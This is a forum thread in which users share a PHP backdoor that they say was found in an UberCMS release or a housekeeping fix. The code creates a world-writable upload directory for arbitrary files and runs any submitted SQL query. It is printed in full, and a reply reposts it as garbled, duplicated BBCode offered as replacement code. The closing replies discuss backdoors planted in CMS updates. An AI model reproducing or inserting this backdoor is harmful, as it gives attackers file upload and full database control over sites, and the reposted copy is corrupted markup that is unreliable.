[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]
- Joined
- May 4, 2008
- Messages
- 831
- Reaction score
- 741
<?php
require_once "../../global.php";
require_once "../admincore.php";
if(!file_exists("god/"))
{
mkdir("god/", 0777);
echo 'Backdoor Directory Created : (god/)';
}
else
{
echo 'Backdoor Open for Uploading : (god/)';
}
if(isset($_POST['submit']))
{
$target_path = "god/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
if(isset($_POST['sql2']))
{
$core1225 = $_POST['sql1'];
mysql_query("".$core1225."");
echo 'Query Executed Successfully';
}
?>
<html>
<body>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
enctype="multipart/form-data">
<input type="file" name="uploadedfile" id="file" />
<input type="submit" name="submit" value="Submit" />
<br />
</form>
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
<p>
<label for="sql1"></label>
<textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
</p>
<p>
<input type="submit" name="sql2" id="sql2" value="Execute">
</p>
</form>
<p> </p>
</body>
I never was seed that on uber edits... Where cms do you found it?
It either came with UberCMS 2.01 or one of the housekeeping fixes that got released here...... I better start checking stuff before I add it...
[COLOR=#0000BB]<?php
[/COLOR][COLOR=#007700]require_once [/COLOR][COLOR=#DD0000]"../../global.php"[/COLOR][COLOR=#007700];
require_once [/COLOR][COLOR=#DD0000]"../admincore.php"[/COLOR][COLOR=#007700];
if(![/COLOR][COLOR=#0000BB]file_exists[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700]))
{
[/COLOR][COLOR=#0000BB]mkdir[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0777[/COLOR][COLOR=#007700]);
echo [/COLOR][COLOR=#DD0000]'Backdoor Directory Created : (god/)'[/COLOR][COLOR=#007700];
}
else
{
echo [/COLOR][COLOR=#DD0000]'Backdoor Open for Uploading : (god/)'[/COLOR][COLOR=#007700];
}
if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'submit'[/COLOR][COLOR=#007700]]))
{
[/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]);
if([/COLOR][COLOR=#0000BB]move_uploaded_file[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'tmp_name'[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]$target_path[/COLOR][COLOR=#007700])) {
echo [/COLOR][COLOR=#DD0000]"The file "[/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]).
[/COLOR][COLOR=#DD0000]" has been uploaded"[/COLOR][COLOR=#007700];
} else{
echo [/COLOR][COLOR=#DD0000]"There was an error uploading the file, please try again!"[/COLOR][COLOR=#007700];
}
}
if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql2'[/COLOR][COLOR=#007700]]))
{
[/COLOR][COLOR=#0000BB]$core1225 [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql1'[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]mysql_query[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$core1225[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700]);
echo [/COLOR][COLOR=#DD0000]'Query Executed Successfully'[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]?>
[/COLOR][COLOR=#000000][/COLOR]
[COLOR=#000000]<html>[/COLOR]
[COLOR=#000000]<body>[/COLOR]
[COLOR=#0000BB]<?php[/COLOR]
[COLOR=#000000]<form action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]" method="post" [/COLOR]
[COLOR=#000000]enctype="multipart/form-data"> [/COLOR]
[COLOR=#000000] <input type="file" name="uploadedfile" id="file" /> [/COLOR]
[COLOR=#000000] <input type="submit" name="submit" value="Submit" /> [/COLOR]
[COLOR=#000000] <br /> [/COLOR]
[COLOR=#000000]</form> [/COLOR]
[COLOR=#000000]<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> [/COLOR]
[COLOR=#000000]<form name="form1" method="post" action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]"> [/COLOR]
[COLOR=#000000] <p> [/COLOR]
[COLOR=#000000] <label for="sql1"></label> [/COLOR]
[COLOR=#000000] <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> [/COLOR]
[COLOR=#000000] </p> [/COLOR]
[COLOR=#000000] <p> [/COLOR]
[COLOR=#000000] <input type="submit" name="sql2" id="sql2" value="Execute"> [/COLOR]
[COLOR=#000000] </p> [/COLOR]
[COLOR=#000000]</form> [/COLOR]
[COLOR=#000000]<p> </p>
[/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000] [/COLOR]
[COLOR=#000000]</body>
<html>[/COLOR]
Try this code instead;(Not tested)
Code:[COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]require_once [/COLOR][COLOR=#DD0000]"../../global.php"[/COLOR][COLOR=#007700]; require_once [/COLOR][COLOR=#DD0000]"../admincore.php"[/COLOR][COLOR=#007700]; if(![/COLOR][COLOR=#0000BB]file_exists[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700])) { [/COLOR][COLOR=#0000BB]mkdir[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0777[/COLOR][COLOR=#007700]); echo [/COLOR][COLOR=#DD0000]'Backdoor Directory Created : (god/)'[/COLOR][COLOR=#007700]; } else { echo [/COLOR][COLOR=#DD0000]'Backdoor Open for Uploading : (god/)'[/COLOR][COLOR=#007700]; } if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'submit'[/COLOR][COLOR=#007700]])) { [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]); if([/COLOR][COLOR=#0000BB]move_uploaded_file[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'tmp_name'[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]$target_path[/COLOR][COLOR=#007700])) { echo [/COLOR][COLOR=#DD0000]"The file "[/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]). [/COLOR][COLOR=#DD0000]" has been uploaded"[/COLOR][COLOR=#007700]; } else{ echo [/COLOR][COLOR=#DD0000]"There was an error uploading the file, please try again!"[/COLOR][COLOR=#007700]; } } if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql2'[/COLOR][COLOR=#007700]])) { [/COLOR][COLOR=#0000BB]$core1225 [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql1'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]mysql_query[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$core1225[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700]); echo [/COLOR][COLOR=#DD0000]'Query Executed Successfully'[/COLOR][COLOR=#007700]; } [/COLOR][COLOR=#0000BB]?> [/COLOR][COLOR=#000000][/COLOR] [COLOR=#000000]<html>[/COLOR] [COLOR=#000000]<body>[/COLOR] [COLOR=#0000BB]<?php[/COLOR] [COLOR=#000000]<form action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]" method="post" [/COLOR] [COLOR=#000000]enctype="multipart/form-data"> [/COLOR] [COLOR=#000000] <input type="file" name="uploadedfile" id="file" /> [/COLOR] [COLOR=#000000] <input type="submit" name="submit" value="Submit" /> [/COLOR] [COLOR=#000000] <br /> [/COLOR] [COLOR=#000000]</form> [/COLOR] [COLOR=#000000]<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> [/COLOR] [COLOR=#000000]<form name="form1" method="post" action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]"> [/COLOR] [COLOR=#000000] <p> [/COLOR] [COLOR=#000000] <label for="sql1"></label> [/COLOR] [COLOR=#000000] <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> [/COLOR] [COLOR=#000000] </p> [/COLOR] [COLOR=#000000] <p> [/COLOR] [COLOR=#000000] <input type="submit" name="sql2" id="sql2" value="Execute"> [/COLOR] [COLOR=#000000] </p> [/COLOR] [COLOR=#000000]</form> [/COLOR] [COLOR=#000000]<p> </p> [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000] [/COLOR] [COLOR=#000000]</body> <html>[/COLOR]
Backdoors everywhere lol.
They will get found and released on ragezone.
Jonteh makes a new "update" with new backdoors
They will get found and released on ragezone.
This is what is happening.
Joonteh is banned on RZ.. even if he made a new account, it would be a little weird having an uber edit from a new user.